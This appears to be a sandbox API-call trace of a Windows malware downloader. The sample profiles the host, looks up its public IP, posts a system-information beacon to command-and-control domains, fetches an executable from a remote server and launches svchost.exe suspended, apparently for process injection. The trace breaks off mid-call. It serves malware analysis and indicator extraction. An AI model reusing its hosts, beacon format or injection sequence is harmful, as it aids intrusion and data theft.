0x7768ab49 [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="HttpQueryInfoA") returned 0x7768a33e [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="InternetCrackUrlA") returned 0x7767d075 [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="HttpOpenRequestA") returned 0x77694c7d [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="InternetSetOptionA") returned 0x776875e8 [0195.694] GetProcAddress (hModule=0x77670000, lpProcName="InternetQueryOptionA") returned 0x77681b56 [0195.694] GetProcAddress (hModule=0x77670000, lpProcName="InternetReadFile") returned 0x7768b406 [0195.694] GetProcAddress (hModule=0x77670000, lpProcName="InternetConnectA") returned 0x776949e9 [0195.694] LoadLibraryExA (lpLibFileName="IPHLPAPI.DLL", hFile=0x0, dwFlags=0x0) returned 0x74390000 [0195.702] GetProcAddress (hModule=0x74390000, lpProcName="GetAdaptersAddresses") returned 0x74396a4d [0195.702] LoadLibraryExA (lpLibFileName="NETAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x664f0000 [0196.099] GetProcAddress (hModule=0x664f0000, lpProcName="DsEnumerateDomainTrustsA") returned 0x664b6769 [0196.335] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77b70000 [0196.336] GetProcAddress (hModule=0x77b70000, lpProcName="RtlDecompressBuffer") returned 0x77c2fded [0196.336] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x77350000 [0196.336] GetProcAddress (hModule=0x77350000, lpProcName="K32GetProcessImageFileNameA") returned 0x77408c2e [0196.336] GetProcAddress (hModule=0x77350000, lpProcName="K32EnumProcesses") returned 0x7738691f [0196.336] GetProcAddress (hModule=0x77350000, lpProcName="GetComputerNameA") returned 0x7737b6e0 [0196.336] GetProcAddress (hModule=0x77350000, lpProcName="HeapAlloc") returned 0x77b9e026 [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="HeapFree") returned 0x773614c9 [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="GetProcessHeap") returned 0x773614e9 [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="Sleep") returned 0x773610ff [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="lstrcpyA") returned 0x77382a9d [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="GetVolumeInformationA") returned 0x77386dcb [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="GetVersion") returned 0x77364467 [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="GetWindowsDirectoryA") returned 0x77382b0a [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="lstrcatA") returned 0x77382b7a [0196.337] GetProcAddress (hModule=0x77350000, lpProcName="lstrlenA") returned 0x77365a4b [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="GetEnvironmentVariableA") returned 0x773633a0 [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="CreateFileA") returned 0x773653c6 [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="WriteFile") returned 0x77361282 [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="GetTempPathA") returned 0x7738276c [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="GetTempFileNameA") returned 0x77389d3f [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="CloseHandle") returned 0x77361410 [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="GetLastError") returned 0x773611c0 [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="TerminateProcess") returned 0x7737d802 [0196.338] GetProcAddress (hModule=0x77350000, lpProcName="CreateThread") returned 0x773634d5 [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="CreateRemoteThread") returned 0x773e416b [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="ResumeThread") returned 0x773643ef [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="CreateProcessA") returned 0x77361072 [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="GetProcessId") returned 0x7738cf04 [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="GetThreadContext") returned 0x773879d4 [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="SetThreadContext") returned 0x773e5393 [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="OpenProcess") returned 0x77361986 [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="GetSystemInfo") returned 0x773649ca [0196.339] GetProcAddress (hModule=0x77350000, lpProcName="VirtualAlloc") returned 0x77361856 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="VirtualFree") returned 0x7736186e [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="VirtualAllocEx") returned 0x7737d9b0 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="WriteProcessMemory") returned 0x7737d9e0 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="VirtualFreeEx") returned 0x7737d9c8 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="GetModuleHandleA") returned 0x77361245 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="GetProcAddress") returned 0x77361222 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="LoadLibraryA") returned 0x773649d7 [0196.340] GetProcAddress (hModule=0x77350000, lpProcName="lstrcmpiA") returned 0x77363e8e [0196.340] LoadLibraryExA (lpLibFileName="USER32.dll", hFile=0x0, dwFlags=0x0) returned 0x76af0000 [0196.341] GetProcAddress (hModule=0x76af0000, lpProcName="wsprintfA") returned 0x76b1ae5f [0196.341] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76bf0000 [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptReleaseContext") returned 0x76bfe124 [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptDestroyHash") returned 0x76bfdf66 [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptHashData") returned 0x76bfdf36 [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptCreateHash") returned 0x76bfdf4e [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptDecrypt") returned 0x76c33178 [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptDestroyKey") returned 0x76bfc51a [0196.341] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptDeriveKey") returned 0x76c33188 [0196.342] GetProcAddress (hModule=0x76bf0000, lpProcName="OpenProcessToken") returned 0x76c04304 [0196.342] GetProcAddress (hModule=0x76bf0000, lpProcName="CryptAcquireContextA") returned 0x76bf91dd [0196.342] GetProcAddress (hModule=0x76bf0000, lpProcName="LookupAccountSidA") returned 0x76c31daa [0196.342] GetProcAddress (hModule=0x76bf0000, lpProcName="GetTokenInformation") returned 0x76c0431c [0196.342] VirtualProtect (in: lpAddress=0x64f40000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x4) returned 1 [0196.342] VirtualProtect (in: lpAddress=0x64f41000, dwSize=0x3000, flNewProtect=0x20, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x4) returned 1 [0196.369] VirtualProtect (in: lpAddress=0x64f44000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x4) returned 1 [0196.369] VirtualProtect (in: lpAddress=0x64f45000, dwSize=0x3000, flNewProtect=0x4, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x4) returned 1 [0196.370] VirtualProtect (in: lpAddress=0x64f48000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x4) returned 1 [0196.370] VirtualProtect (in: lpAddress=0x64f49000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x4) returned 1 [0196.370] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.412] GetProcessHeap () returned 0x5d0000 [0196.412] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x2240020 [0196.413] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x23d0020 [0196.413] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x65ba68 [0196.413] GetVersion () returned 0x1db10106 [0196.414] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8000) returned 0x673aa0 [0196.414] GetAdaptersAddresses (in: Family=0x2, Flags=0x0, Reserved=0x0, AdapterAddresses=0x673aa0, SizePointer=0x14e3bc*=0x8000 | out: AdapterAddresses=0x673aa0*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x673dc0, AdapterName="{954905E5-5ED1-4BAF-AC14-2C2B8B445E08}", FirstUnicastAddress=0x673ce0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x673d20, FirstDnsServerAddress=0x673d98, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #3", FriendlyName="Local Area Connection 3", PhysicalAddress=([0]=0xa0, [1]=0x6c, [2]=0xec, [3]=0xb0, [4]=0x20, [5]=0x21, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000008000000, Dhcpv4Server.lpSockaddr=0x673c18*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x116cc217, FirstDnsSuffix=0x0), SizePointer=0x14e3bc*=0x8000) returned 0x0 [0196.451] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x673aa0 | out: hHeap=0x5d0000) returned 1 [0196.451] GetWindowsDirectoryA (in: lpBuffer=0x14e288, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0196.451] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x14e38c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x14e38c*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.452] GetComputerNameA (in: lpBuffer=0x14e2c0, nSize=0x14e3c4 | out: lpBuffer="Q9IATRKPRH", nSize=0x14e3c4) returned 1 [0196.454] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0196.454] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0196.454] K32EnumProcesses (in: lpidProcess=0x14ce80, cb=0x1000, lpcbNeeded=0x14df88 | out: lpidProcess=0x14ce80, lpcbNeeded=0x14df88) returned 1 [0196.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0196.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0196.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c0) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0196.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x19c [0196.460] K32GetProcessImageFileNameA (in: hProcess=0x19c, lpImageFileName=0x14cd5c, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0196.461] CloseHandle (hObject=0x19c) returned 1 [0196.461] lstrcpyA (in: lpString1=0x14de80, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0196.461] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0196.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x19c [0196.461] OpenProcessToken (in: ProcessHandle=0x19c, DesiredAccess=0x20008, TokenHandle=0x14df74 | out: TokenHandle=0x14df74*=0x194) returned 1 [0196.461] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14df7c | out: TokenInformation=0x0, ReturnLength=0x14df7c) returned 0 [0196.461] GetLastError () returned 0x7a [0196.461] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x6561b0 [0196.461] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x1, TokenInformation=0x6561b0, TokenInformationLength=0x24, ReturnLength=0x14df7c | out: TokenInformation=0x6561b0, ReturnLength=0x14df7c) returned 1 [0196.461] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x6561b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x14df9c, cchName=0x14df90, ReferencedDomainName=0x14e0a0, cchReferencedDomainName=0x14df98, peUse=0x14df64 | out: Name="kEecfMwgj", cchName=0x14df90, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x14df98, peUse=0x14df64) returned 1 [0196.464] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6561b0 | out: hHeap=0x5d0000) returned 1 [0196.464] lstrcpyA (in: lpString1=0x14e1bc, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0196.464] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0196.464] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0196.464] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0196.464] InternetCrackUrlA (lpszUrl="http://api.ipify.org", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e344) [0196.700] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0196.701] InternetConnectA (hInternet=0xcc0004, lpszServerName="api.ipify.org", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0196.701] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47050*="*/*", dwFlags=0x84080100, dwContext=0x1) [0196.708] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0197.068] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14e390, lpdwBufferLength=0x14e384, lpdwIndex=0x0 | out: lpBuffer=0x14e390*, lpdwBufferLength=0x14e384*=0x4, lpdwIndex=0x0) returned 1 [0197.068] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x64f47280, dwNumberOfBytesToRead=0x20, lpdwNumberOfBytesRead=0x14e3a4 | out: lpBuffer=0x64f47280*, lpdwNumberOfBytesRead=0x14e3a4*=0xc) returned 1 [0197.068] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x64f4728c, dwNumberOfBytesToRead=0x14, lpdwNumberOfBytesRead=0x14e3a4 | out: lpBuffer=0x64f4728c*, lpdwNumberOfBytesRead=0x14e3a4*=0x0) returned 1 [0197.068] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0197.068] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0197.068] lstrcpyA (in: lpString1=0x14fcd4, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0197.068] DsEnumerateDomainTrustsA () returned 0x6b5 [0197.078] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77350000 [0197.079] GetProcAddress (hModule=0x77350000, lpProcName="GetNativeSystemInfo") returned 0x773710b5 [0197.079] GetNativeSystemInfo (in: lpSystemInfo=0x14e3a0 | out: lpSystemInfo=0x14e3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0197.079] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x69c9e8 [0197.079] CryptAcquireContextA (in: phProv=0x14e394, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x14e394*=0x635f50) returned 1 [0197.143] CryptCreateHash (in: hProv=0x635f50, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x14e398 | out: phHash=0x14e398) returned 1 [0197.143] CryptHashData (hHash=0x64b148, pbData=0x64f45010, dwDataLen=0x8, dwFlags=0x0) returned 1 [0197.143] CryptDeriveKey (in: hProv=0x635f50, Algid=0x6801, hBaseData=0x64b148, dwFlags=0x280011, phKey=0x14e390 | out: phKey=0x14e390*=0x64b108) returned 1 [0197.144] CryptDecrypt (in: hKey=0x64b108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x69c9e8, pdwDataLen=0x14e3a8 | out: pbData=0x69c9e8, pdwDataLen=0x14e3a8) returned 1 [0197.145] CryptDestroyHash (hHash=0x64b148) returned 1 [0197.145] CryptDestroyKey (hKey=0x64b108) returned 1 [0197.145] CryptReleaseContext (hProv=0x635f50, dwFlags=0x0) returned 1 [0197.145] wsprintfA (in: param_1=0x14e3d4, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0197.145] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x400) returned 0x6863c0 [0197.145] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0197.145] lstrlenA (lpString="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0197.145] InternetCrackUrlA (in: lpszUrl="http://hosouggs.com/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e34c | out: lpUrlComponents=0x14e34c) returned 1 [0197.145] InternetConnectA (hInternet=0xcc0004, lpszServerName="hosouggs.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0197.145] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0197.145] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x14e3d4*, dwOptionalLength=0x79) returned 0 [0218.200] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0218.200] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0218.201] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0218.201] lstrlenA (lpString="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0218.201] InternetCrackUrlA (in: lpszUrl="http://mancause.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e34c | out: lpUrlComponents=0x14e34c) returned 1 [0218.201] InternetConnectA (hInternet=0xcc0004, lpszServerName="mancause.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0218.201] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0218.202] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x14e3d4*, dwOptionalLength=0x79) returned 1 [0218.338] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14e3a0, lpdwBufferLength=0x14e388, lpdwIndex=0x0 | out: lpBuffer=0x14e3a0*, lpdwBufferLength=0x14e388*=0x4, lpdwIndex=0x0) returned 1 [0218.338] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2240020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x14fd28 | out: lpBuffer=0x2240020*, lpdwNumberOfBytesRead=0x14fd28*=0x38) returned 1 [0218.339] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0218.339] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0218.339] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x500000) returned 0x2bd0020 [0218.340] InternetCrackUrlA (in: lpszUrl="http://kubantr0.ru/7gfdg5egds.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14fa60 | out: lpUrlComponents=0x14fa60) returned 1 [0218.340] InternetConnectA (hInternet=0xcc0004, lpszServerName="kubantr0.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0218.340] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/7gfdg5egds.exe", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47050*="*/*", dwFlags=0x84080100, dwContext=0x1) returned 0xcc000c [0218.340] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0218.548] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14faac, lpdwBufferLength=0x14faa0, lpdwIndex=0x0 | out: lpBuffer=0x14faac*, lpdwBufferLength=0x14faa0*=0x4, lpdwIndex=0x0) returned 1 [0218.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2bd0020, dwNumberOfBytesToRead=0x500000, lpdwNumberOfBytesRead=0x14fac0 | out: lpBuffer=0x2bd0020*, lpdwNumberOfBytesRead=0x14fac0*=0x42a0e) returned 1 [0218.710] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c12a2e, dwNumberOfBytesToRead=0x4bd5f2, lpdwNumberOfBytesRead=0x14fac0 | out: lpBuffer=0x2c12a2e*, lpdwNumberOfBytesRead=0x14fac0*=0x0) returned 1 [0218.710] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0218.710] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0218.710] GetEnvironmentVariableA (in: lpName="SystemRoot", lpBuffer=0x14fb70, nSize=0x104 | out: lpBuffer="") returned 0xa [0218.710] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\System32\\svchost.exe" | out: lpString1="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0218.710] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\System32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x424, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14fc74*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14fcb8 | out: 